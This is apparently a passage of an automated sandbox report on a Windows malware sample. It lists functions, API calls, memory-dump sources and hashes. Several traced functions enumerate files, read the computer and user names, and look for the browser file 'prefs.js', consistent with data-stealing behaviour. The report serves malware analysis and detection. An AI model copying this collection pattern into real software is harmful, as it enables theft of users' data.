                                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Virtual$AllocFree
                                                  • String ID:
                                                  • API String ID: 2087232378-0
                                                  • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                  • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                                  • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                  • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                                  Function 00401190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                    • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                    • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                    • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                    • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                    • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                  • ExitProcess.KERNEL32 ref: 004011C6
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$Process$AllocName$ComputerExitUser
                                                  • String ID:
                                                  • API String ID: 1004333139-0
                                                  • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                                  • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                                  • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                                  • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                                  Function 02D19A35 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02D19A86
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422568211.0000000002D19000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D19000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2d19000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                  • Instruction ID: 0b211559277fa09b384a9e92a6757c03272f1555c212598e5bf21c5d43cba274
                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                  • Instruction Fuzzy Hash: 16112A79A00208EFDB01DF98C995E98BBF5AF08350F058094F9489B361D371EA50DF90

                                                  Non-executed Functions

                                                  Function 004138B0 Relevance: 47.5, APIs: 21, Strings: 6, Instructions: 250filestringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • wsprintfA.USER32 ref: 004138CC
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                                  • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                                  • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                                  • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                                  • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                  • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                                  • API String ID: 1125553467-817767981
                                                  • Opcode ID: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                                  • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                                  • Opcode Fuzzy Hash: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                                  • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                                  Function 00414910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • wsprintfA.USER32 ref: 0041492C
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                  • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                  • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                  • FindClose.KERNEL32(000000FF), ref: 00414B92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                  • String ID: %s\%s$%s\%s$%s\*
                                                  • API String ID: 180737720-445461498
                                                  • Opcode ID: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                                  • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                                                  • Opcode Fuzzy Hash: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                                  • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                                                  Function 02F13B17 Relevance: 31.8, APIs: 21, Instructions: 250filestringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • wsprintfA.USER32 ref: 02F13B33
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 02F13B4A
                                                  • lstrcat.KERNEL32(?,?), ref: 02F13B9C
                                                  • StrCmpCA.SHLWAPI(?,00420F70), ref: 02F13BAE
                                                  • StrCmpCA.SHLWAPI(?,00420F74), ref: 02F13BC4
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 02F13ECE
                                                  • FindClose.KERNEL32(000000FF), ref: 02F13EE3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                  • String ID:
                                                  • API String ID: 1125553467-0
                                                  • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                                  • Instruction ID: 908fc48404c02853de309fd45a784b5023e057150adc802fda709bb957b91b6e
                                                  • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                                  • Instruction Fuzzy Hash: 08A152B5A40218ABDB34DFA4DD84FEE737AFB49340F4445C8A60D96180EB759B84CF62
                                                  Function 00414570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00414587
                                                  • wsprintfA.USER32 ref: 004145A6
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                                  • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                                                  • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                                                  • FindClose.KERNEL32(000000FF), ref: 004146A0
                                                  • lstrcatA.KERNEL32(?,02D4AE80,?,00000104), ref: 004146C5
                                                  • lstrcatA.KERNEL32(?,02D49E30), ref: 004146D8
                                                  • lstrlenA.KERNEL32(?), ref: 004146E5
                                                  • lstrlenA.KERNEL32(?), ref: 004146F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                                  • String ID: %s\%s$%s\*
                                                  • API String ID: 13328894-2848263008
                                                  • Opcode ID: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                                  • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                                                  • Opcode Fuzzy Hash: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                                  • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                                                  Function 02F14B77 Relevance: 27.2, APIs: 18, Instructions: 172fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • wsprintfA.USER32 ref: 02F14B93
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 02F14BAA
                                                  • StrCmpCA.SHLWAPI(?,00420FDC), ref: 02F14BD8
                                                  • StrCmpCA.SHLWAPI(?,00420FE0), ref: 02F14BEE
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 02F14DE4
                                                  • FindClose.KERNEL32(000000FF), ref: 02F14DF9
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                  • String ID:
                                                  • API String ID: 180737720-0
                                                  • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                                  • Instruction ID: dfa8ed7a785a203c1de376d4afa7969e179dabb8e7afd8b5d844cd949b64c37d
                                                  • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                                  • Instruction Fuzzy Hash: CD617AB5A40218BBCB24EBE0DD84FEA73BDFB49701F44458CA60D96180EB75A745CF91
                                                  Function 00413EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • wsprintfA.USER32 ref: 00413EC3
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                                                  • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                                                  • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                                                  • FindClose.KERNEL32(000000FF), ref: 00414081
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                  • String ID: %s\%s
                                                  • API String ID: 180737720-4073750446
                                                  • Opcode ID: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                                  • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                                                  • Opcode Fuzzy Hash: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                                  • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                                                  Function 02F147D7 Relevance: 22.6, APIs: 15, Instructions: 137stringmemoryfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 02F147E7
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F147EE
                                                  • wsprintfA.USER32 ref: 02F1480D
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 02F14824
                                                  • StrCmpCA.SHLWAPI(?,00420FC4), ref: 02F14852
                                                  • StrCmpCA.SHLWAPI(?,00420FC8), ref: 02F14868
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 02F148F2
                                                  • FindClose.KERNEL32(000000FF), ref: 02F14907
                                                  • lstrcat.KERNEL32(?,0064A524), ref: 02F1492C
                                                  • lstrcat.KERNEL32(?,0064A22C), ref: 02F1493F
                                                  • lstrlen.KERNEL32(?), ref: 02F1494C
                                                  • lstrlen.KERNEL32(?), ref: 02F1495D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                                  • String ID:
                                                  • API String ID: 671575355-0
                                                  • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                                  • Instruction ID: 0f658da4b5cb24a936fe649ef21efd189a51d3c8617ed8b67d977443932052f1
                                                  • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                                  • Instruction Fuzzy Hash: 885177B5980218ABD724EBB0DD89FEE737DEB54740F804588E60D92190EB749B84CF91
                                                  Function 02F14107 Relevance: 18.1, APIs: 12, Instructions: 133fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • wsprintfA.USER32 ref: 02F1412A
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 02F14141
                                                  • StrCmpCA.SHLWAPI(?,00420FAC), ref: 02F1416F
                                                  • StrCmpCA.SHLWAPI(?,00420FB0), ref: 02F14185
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 02F142D3
                                                  • FindClose.KERNEL32(000000FF), ref: 02F142E8
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                  • String ID:
                                                  • API String ID: 180737720-0
                                                  • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                                  • Instruction ID: c6082c9b236f74da3110815e13aea396ed5cf54601e4e34fec3ab47aaeed863d
                                                  • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                                  • Instruction Fuzzy Hash: DA5173B6900218BBDB24FBB0DD84EEA737DBB84340F404588A74992080EB75E785CF95
                                                  Function 0040ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • wsprintfA.USER32 ref: 0040ED3E
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                                                  • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                                                  • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                                                  • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                  • String ID: %s\*.*
                                                  • API String ID: 180737720-1013718255
                                                  • Opcode ID: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                                  • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                                                  • Opcode Fuzzy Hash: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                                  • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                                  Function 0040DE10 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                                  • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                                  • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                                  • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                  • String ID: 4@$\*.*
                                                  • API String ID: 2325840235-1993203227
                                                  • Opcode ID: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                                  • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                                  • Opcode Fuzzy Hash: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                                  • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                                  Function 0040F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                                  • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                                  • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                                  • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                  • String ID: prefs.js
                                                  • API String ID: 3334442632-3783873740
                                                  • Opcode ID: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                  • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                                  • Opcode Fuzzy Hash: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                  • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                                  Function 004016D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,00401F2C,?,004251C4,?,?,00000000,?,00000000), ref: 00401923
                                                  • StrCmpCA.SHLWAPI(?,0042526C), ref: 00401973
                                                  • StrCmpCA.SHLWAPI(?,00425314), ref: 00401989
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                                  • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                                  • FindClose.KERNEL32(000000FF), ref: 00401E32
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
